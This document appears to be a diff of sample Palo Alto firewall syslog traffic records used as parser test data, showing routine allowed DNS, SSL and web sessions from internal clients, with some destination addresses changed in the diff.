States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7601,1,42403,53,29739,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:27,0,any,0,2825849,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,6818,1,35615,53,24414,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:27,0,any,0,2825851,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +527 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:26,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,8108,1,60824,53,28825,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:57,0,any,0,2825848,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7601,1,42403,53,29739,53,0x400000,udp,allow,97,97,0,1,2020/03/27 
09:57:27,0,any,0,2825849,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,6818,1,35615,53,24414,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:27,0,any,0,2825851,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 576 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:25,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,7577,1,59652,443,35333,443,0x1400000,tcp,allow,4605,1298,3307,11,2020/03/27 09:57:26,0,computer-and-internet-info,0,2825842,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 537 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:25,192.168.2.3,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,7223,1,49731,443,23376,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:26,0,any,0,2825843,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 571 <14>1 2020-03-27T09:57:25+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:25,192.168.2.3,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 
09:57:25,7032,1,49727,443,22055,443,0x400070,tcp,allow,19474,1561,17913,28,2020/03/27 09:57:10,1,government,0,2825840,0x0,192.168.0.0-192.168.255.255,United States,0,10,18,tcp-rst-from-client,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 554 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:25,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,web-browsing,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,7577,1,59652,443,35333,443,0x1400000,tcp,allow,4605,1298,3307,11,2020/03/27 09:57:26,0,any,0,2825841,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -528 <14>1 2020-03-27T09:57:25+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:25,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,6830,1,56089,53,52306,53,0x400064,udp,allow,248,108,140,2,2020/03/27 09:56:56,0,any,0,2825839,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +528 <14>1 2020-03-27T09:57:25+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:25,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,6830,1,56089,53,52306,53,0x400064,udp,allow,248,108,140,2,2020/03/27 09:56:56,0,any,0,2825839,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 539 <14>1 2020-03-27T09:57:25+01:00 PA-VM - - - - 1,2020/03/27 09:57:24,015351000043722,TRAFFIC,start,2305,2020/03/27 
09:57:24,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:24,7577,1,59652,443,35333,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:26,0,any,0,2825838,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 571 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.3,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,7185,1,49726,443,52475,443,0x400070,tcp,allow,20666,1563,19103,29,2020/03/27 09:57:06,1,government,0,2825824,0x0,192.168.0.0-192.168.255.255,United States,0,10,19,tcp-rst-from-client,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 535 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,58586,1,39016,514,26342,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:22,0,any,0,2825831,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6907,1,40729,53,24891,53,0x400000,udp,allow,95,95,0,1,2020/03/27 09:57:23,0,any,0,2825832,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 
09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6907,1,40729,53,24891,53,0x400000,udp,allow,95,95,0,1,2020/03/27 09:57:23,0,any,0,2825832,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 538 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,57540,1,41143,514,41559,514,0x500070,tcp,allow,839,567,272,8,2020/03/27 09:57:07,0,any,0,2825822,0x0,192.168.0.0-192.168.255.255,Germany,0,4,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 538 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,47307,1,37533,514,49274,514,0x500070,tcp,allow,839,567,272,8,2020/03/27 09:57:07,0,any,0,2825825,0x0,192.168.0.0-192.168.255.255,Germany,0,4,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -527 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6374,1,42977,53,41087,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:52,0,any,0,2825827,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -520 <14>1 
2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6532,1,52267,53,5824,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:22,0,any,0,2825828,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,7511,1,38271,53,45069,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:22,0,any,0,2825830,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +527 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6374,1,42977,53,41087,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:52,0,any,0,2825827,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +520 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6532,1,52267,53,5824,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:22,0,any,0,2825828,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,7511,1,38271,53,45069,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:22,0,any,0,2825830,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 581 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,62489,1,59647,443,36913,443,0x1400070,tcp,allow,7129,1513,5616,22,2020/03/27 09:57:07,0,computer-and-internet-info,0,2825826,0x0,192.168.0.0-192.168.255.255,United States,0,10,12,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 532 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,7712,1,34594,514,40984,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:22,0,any,0,2825829,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 542 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 
09:57:21,61555,1,34531,443,15855,443,0x400000,tcp,allow,553,479,74,4,2020/03/27 09:57:23,0,any,0,2825833,0x0,192.168.0.0-192.168.255.255,European Union,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 585 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,paloalto-wildfire-cloud,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,61555,1,34531,443,15855,443,0x400000,tcp,allow,553,479,74,4,2020/03/27 09:57:23,0,computer-and-internet-info,0,2825834,0x0,192.168.0.0-192.168.255.255,European Union,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -524 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,57869,1,39926,53,28322,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:21,0,any,0,2825820,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -523 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,6893,1,50703,53,56717,53,0x400000,udp,allow,109,109,0,1,2020/03/27 09:57:21,0,any,0,2825821,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -527 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet 
Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7565,1,44390,53,39698,53,0x400064,udp,allow,205,75,130,2,2020/03/27 09:56:50,0,any,0,2825811,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +524 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,57869,1,39926,53,28322,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:21,0,any,0,2825820,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +523 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,6893,1,50703,53,56717,53,0x400000,udp,allow,109,109,0,1,2020/03/27 09:57:21,0,any,0,2825821,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +527 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7565,1,44390,53,39698,53,0x400064,udp,allow,205,75,130,2,2020/03/27 09:56:50,0,any,0,2825811,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 521 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 
09:57:19,192.168.1.3,208.67.222.222,0.0.0.0,208.67.222.222,Internet Access,,,dns,vsys1,Servers,External,ethernet1/2,ethernet1/1,Default,2020/03/27 09:57:19,7419,1,62393,53,18633,53,0x400064,udp,allow,216,92,124,2,2020/03/27 09:56:50,0,any,0,2825813,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 538 <14>1 2020-03-27T09:57:20+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:19,192.168.2.3,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,58777,1,49729,443,51060,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:20,0,any,0,2825814,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -526 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,6640,1,52595,53,8498,53,0x400064,udp,allow,235,80,155,2,2020/03/27 09:56:50,0,any,0,2825812,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +526 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,6640,1,52595,53,8498,53,0x400064,udp,allow,235,80,155,2,2020/03/27 09:56:50,0,any,0,2825812,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 538 <14>1 2020-03-27T09:57:20+01:00 PA-VM - - - - 1,2020/03/27 
09:57:19,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:19,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7210,1,59651,443,2020,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:21,0,any,0,2825815,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 553 <14>1 2020-03-27T09:57:20+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:19,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,web-browsing,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7210,1,59651,443,2020,443,0x1400000,tcp,allow,4691,1279,3412,12,2020/03/27 09:57:21,0,any,0,2825816,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 575 <14>1 2020-03-27T09:57:20+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:19,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7210,1,59651,443,2020,443,0x1400000,tcp,allow,4691,1279,3412,12,2020/03/27 09:57:21,0,computer-and-internet-info,0,2825817,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 
@@ -95,6 +95,6 @@
 546 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:18,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:18,192.168.2.3,208.67.222.222,0.0.0.0,208.67.222.222,Internet Access,,,dnscrypt,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:18,6929,1,54614,443,4663,443,0x400000,udp,allow,904,238,666,2,2020/03/27 09:57:19,0,any,0,2825810,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 535 <14>1 2020-03-27T09:57:16+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:16,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,6325,1,40343,514,32978,514,0x500070,tcp,allow,905,633,272,9,2020/03/27 09:57:02,0,any,0,2825797,0x0,192.168.0.0-192.168.255.255,Germany,0,5,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 537 <14>1 2020-03-27T09:57:16+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:16,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,7298,1,34636,514,16599,514,0x500070,tcp,allow,905,633,272,9,2020/03/27 09:57:02,0,any,0,2825798,0x0,192.168.0.0-192.168.255.255,Germany,0,5,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
